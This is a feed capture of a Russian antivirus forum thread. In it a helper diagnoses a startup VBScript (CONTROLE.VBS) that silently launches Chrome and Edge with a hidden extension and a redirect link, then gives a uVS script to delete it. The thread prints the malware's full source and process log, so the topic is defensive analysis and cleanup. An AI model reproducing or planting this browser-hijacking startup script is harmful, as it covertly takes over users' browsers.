			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114403/</guid>
			<pubDate>Wed, 17 Aug 2022 18:31:36 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114402/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_T8M33Q3c" href="/user/80765/" bx-tooltip-user-id="80765">Kot Obormot</a> написал:<br />P.S. Надо было, наверное, сделать резервную копию этого файла перед удалением... Эхъ <br />=============<br /><br />На V.T в колонке: Behavior есть весть текст скрипта.<br /><br />
====code====
<pre>1988 - c:/windows/system32/cscript.exe Controle.vbs
2264 - C:&#92;Program Files (x86)&#92;Google&#92;Chrome&#92;Application&#92;chrome.exe --load-extension=C:&#92;ProgLog&#92;ProgLog&#92;ProgLog&#92;ProgLog&#92;ProgLog&#92;ProgLog&#92;ProgLog https://short-link.space/download/GT/redirect.php?_____Signe=_____ok&#38;source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000
2312 - C:&#92;Program Files (x86)&#92;Google&#92;Chrome&#92;Application&#92;chrome.exe --type=crashpad-handler --user-data-dir=C:&#92;Users&#92;&#60;USER&#62;&#92;AppData&#92;Local&#92;Google&#92;Chrome&#92;User Data /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:&#92;Users&#92;&#60;USER&#62;&#92;AppData&#92;Local&#92;Google&#92;Chrome&#92;User Data&#92;Crashpad --metrics-dir=C:&#92;Users&#92;&#60;USER&#62;&#92;AppData&#92;Local&#92;Google&#92;Chrome&#92;User Data --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=83.0.4103.97 --initial-client-data=0x18c,0x190,0x194,0x160,0x198,0x7feeaedbd28,0x7feeaedbd38,0x7feeaedbd48 </pre>
============= <br />
			<i>17.08.2022 18:26:39, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114402/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114402/</guid>
			<pubDate>Wed, 17 Aug 2022 18:26:39 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114401/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			И еще, на вирустотале никаких вирусов не нашлось, но как только я указал этот путь к файлу для проверки на вирустотале, мой антивирус сразу вновь сработал)<br /><br /><img src="https://i.ibb.co/7Vh7BZd/image.png" alt="Пользователь добавил изображение" border="0" /> <br />
			<i>17.08.2022 18:25:40, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114401/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114401/</guid>
			<pubDate>Wed, 17 Aug 2022 18:25:40 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114400/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Спасибо Вам большое! Я выполнил Ваш скрипт, теперь нет vbs в автозапуске) Получается, что проблема решена. Но, интересен тот факт, что перед тем, как выполнить скрипт, я загрузил этот файл на virustotal и там также никакой из антивирусов не нашел вируса)<br /><br />P.S. Надо было, наверное, сделать резервную копию этого файла перед удалением... Эхъ <br />А то зверь-то оказался очень необычным) <br />
			<i>17.08.2022 18:21:10, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114400/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114400/</guid>
			<pubDate>Wed, 17 Aug 2022 18:21:10 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114399/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			+<br />В общем с запуском системы запускался скрипт ( CONTROLE.VBS ) &gt; браузер получал команду и выходил на сайт ХХХ с пере-направлением на другой сайт - и там уже этот сайт мог вам показывать всякое :) <br />
			<i>17.08.2022 18:10:23, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114399/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114399/</guid>
			<pubDate>Wed, 17 Aug 2022 18:10:23 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114398/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Полное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\CONTROLE.VBS<br />Имя файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CONTROLE.VBS<br />Тек. статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске <br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br /><noindex><a href="http://www.virustotal.com" target="_blank" rel="nofollow">www.virustotal.com</a></noindex> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;2022-02-17 20:18 [2021-04-06] Файл был чист на момент проверки.<br /><br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Сохраненная информация &nbsp; &nbsp; &nbsp;на момент создания образа<br />Статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;в автозапуске <br />Размер &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;649 байт<br />Создан &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;01.04.2021 в 22:38:31<br />Изменен &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 25.03.2021 в 17:20:04<br />Цифр. подпись &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Отсутствует либо ее не удалось проверить<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Доп. информация &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; на момент обновления списка<br />SHA1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;58367B32AAE4C92208268A1F4B50E37862FC0162<br />MD5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0278DC59F174789C3D2AA24DD835FD3A<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />#FILE# &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;On Error Resume Next<br /><br /><br />Dim WShell<br />Set WShell = CreateObject(&quot;WScript.Shell&quot;)<br /><br />WShell.Run &quot;chrome.exe &nbsp;--load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog	????://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000&quot;, 0<br />WShell.Run &quot;msedge.exe &nbsp;--load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog	????://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000&quot;, 0<br /><br />Set WShell = Nothing<br /><br /><br />On Error Goto 0<br /><br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылки на объект &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP<br />---------------<br />Файл известен с 2021-04-06<br />И V.T. показывает, что он чист.<br /><noindex><a href="https://www.virustotal.com/gui/file/dd438f4ed90e30e4ed4897937390ef0a9507b88f03eac2a323a00fb456420162?nocache=1" target="_blank" rel="nofollow">https://www.virustotal.com/gui/file/dd438f4ed90e30e4ed4897937390ef0a9507b88f03eac2a<WBR/>&shy;323a00fb456420162?nocache=1</a></noindex> <br />-----------------<br />Для удаления CONTROLE.VBS<br />Скопируйте текст КОДа - в буфер обмена.<br />uVS: start.exe, текущий пользователь, меню, скрипты - выполнить скрипт из буфера обмена.<br />ПЕРЕД ВЫПОЛНЕНИЕМ СКРИПТА, ЗАКРЫТЬ БРАУЗЕРЫ!<br />ВНИМАНИЕ : По окончанию выполнения скрипта компьютер выполнит перезагрузку !<br /><br /><br />
====code====
<pre>

;uVS v4.11.12 &#91;http://dsrt.dyndns.org:8888&#93;
;Target OS: NTv11.0
v400c
OFFSGNSAVE
;---------command-block---------
delall %SystemDrive%&#92;USERS&#92;E8921&#92;APPDATA&#92;ROAMING&#92;MICROSOFT&#92;WINDOWS&#92;START MENU&#92;PROGRAMS&#92;STARTUP&#92;CONTROLE.VBS
apply

restart

</pre>
============= <br />
			<i>17.08.2022 17:45:17, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114398/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114398/</guid>
			<pubDate>Wed, 17 Aug 2022 17:45:17 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114397/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Я удалил Microsoft Edge со следами. Но при старте windows почему-то все равно грузится служба обновления Microsoft Edge, это реально убрать? (крайне редко бывает нужен этот браузер).<br /><br />Я удалил Хром со следами, но при повторной установке ситуация повторилась (даже в профиль не успел зайти, уже открывается странный сайт). Потому я решил пользоваться портативной версией, коли там проблем нет.<br /><br />Попутно у меня при загрузке windows дважды антивирус находил вирус (один и тот же фактически).<br /><br /><img src="https://i.ibb.co/WttD7LF/Screenshot-14.png" alt="Пользователь добавил изображение" border="0" /><br /><br />Но мне написали из службы поддержки одного из антирвирусов различные варианты как справиться, один из них - выполнить чистую загрузку винды. Оказалось, что при пустой автозагрузке хром нормально запускается. А Виновник был найден методом исключения (на скриншоте). Правда <br /><br />Теперь и обычный хром (не портативный) запускается без проблем). Правда этот vonrole.vbs может же еще как-то начудить, а я про это и знать не буду) Не знаю - что с ним делать далее) Понятно, что из автозагрузки его нужно убрать, но что это за зверь, можно ли его взять и удалить?)<br /><br /><img src="https://i.ibb.co/0s7GKF0/image.png" alt="Пользователь добавил изображение" border="0" /> <br />
			<i>17.08.2022 17:26:17, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114397/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114397/</guid>
			<pubDate>Wed, 17 Aug 2022 17:26:17 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114395/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Хорошо, понял, спасибо большое! Еще я заметил, что есть seokistore в Microsoft Edge браузере. Но интересно, что это фоном открывается, в отличии от Хрома. И раньше это я даже не замечал (что там есть seokistore). Попробую все сделать, но уже скорее всего завтра) <br />
			<i>17.08.2022 02:40:36, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114395/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114395/</guid>
			<pubDate>Wed, 17 Aug 2022 02:40:36 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114394/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			В Хроме есть: &nbsp;Экспорт и импорт параметров.<br />В сети есть информация.<br />-------------<br />Есть программа Autoruns <noindex><a href="https://www.comss.ru/page.php?id=1064" target="_blank" rel="nofollow">https://www.comss.ru/page.php?id=1064</a></noindex><br />чтобы программа _???_ не запускалась достаточно снять [v] в чек боксе...  и всё - программа не запуститься. ( после перезапуска системы )<br />+ там есть строка поиска... &nbsp;<br />Если что-то непонятно - то лучше это не трогать. :) <br />
			<i>17.08.2022 02:21:29, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114394/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114394/</guid>
			<pubDate>Wed, 17 Aug 2022 02:21:29 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114393/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			А возможно ли как-то сделать, чтобы не запускался Microsoft Edge? Я в программе CCleaner настроил программы, которые должны запускаться при старте системы. Среди них нет Microsoft Edge. А он еще и подъедает оперативную память и все равно запускается при старте системы. Может быть это еще как-то взаимосвязано?)<br /><br /><img src="https://i.ibb.co/WBP3Rrk/image.png" alt="Пользователь добавил изображение" border="0" /><br /><br />P.S. На всякий случай повторю свой ответ на предыдущей странице, так как его можно было не заметить.<br /><br />Скачал, там (в портативной версии) никаких проблем не наблюдается, все хорошо открывается, никаких самооткрывающихся окон <br />
			<i>17.08.2022 02:08:55, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114393/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114393/</guid>
			<pubDate>Wed, 17 Aug 2022 02:08:55 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114392/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Скачал, там никаких проблем не наблюдается, все хорошо открывается, никаких самооткрывающихся окон <br />
			<i>17.08.2022 02:03:23, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114392/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114392/</guid>
			<pubDate>Wed, 17 Aug 2022 02:03:23 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
	</channel>
</rss>
